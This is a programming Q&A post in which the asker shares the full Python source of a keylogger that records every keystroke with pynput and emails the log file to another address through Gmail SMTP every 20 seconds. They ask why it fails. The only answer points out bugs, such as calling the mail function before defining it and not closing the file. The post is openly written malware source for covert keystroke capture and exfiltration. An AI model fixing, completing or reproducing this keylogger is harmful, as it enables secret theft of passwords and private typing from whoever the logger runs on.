# Why is Python Keylogger not working properly?

Tags: python-3.x

I want to create a keylogger that is going to send the file to mail every x second.

```
import time
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
from email import encoders
from pynput.keyboard import Key, Listener
import logging

log_dir = ''

logging.basicConfig(filename=(log_dir + "Document.txt"),
                    level=logging.DEBUG, format='%(asctime)s: %(message)s')


def on_press(key):
    logging.info(str(key))


with Listener(on_press=on_press) as Listener:
    Listener.join()


mail_send()


def mail_send():

    email_user = 'my mail'
    email_password = 'my pass'

    email_send = 'another mail'

    subject = 'subject'

    msg = MIMEMultipart()
    msg['From'] = email_user
    msg['To'] = email_send
    msg['Subject'] = subject

    body = 'Hi there, sending some stuff!'
    msg.attach(MIMEText(body, 'plain'))

    filename = 'Document.txt'
    attachment = open(filename, 'rb')

    part = MIMEBase('application', 'octet-stream')
    part.set_payload((attachment).read())
    encoders.encode_base64(part)
    part.add_header('Content-Disposition', "attachment; filename= "+filename)

    msg.attach(part)
    text = msg.as_string()
    server = smtplib.SMTP('smtp.gmail.com', 587)
    server.starttls()
    server.login(email_user, email_password)

    server.sendmail(email_user, email_send, text)

    server.quit()

    time.sleep(20)
    mail_send()
```

Code was working well before I added the "keylogging part" 
It's probably not working because the file is being edited by keylogger so I would like to know how to fix it.
(my eng is bad sry)
Thanks for any tip

Answer (score 0):

What's the error message you're getting, if any?

From the code you've given, I can see two problems.

First is that you've called `mail_send()` before defining it, and second that while you are opening the file via `open()`, you're not closing it. You should look up context manager to not have to deal with these issues of closing files/signing out etc.

Comment: Hi, I'm not getting any error on start, the method is fixed, but im getting error after stopping the script ( just code=1 )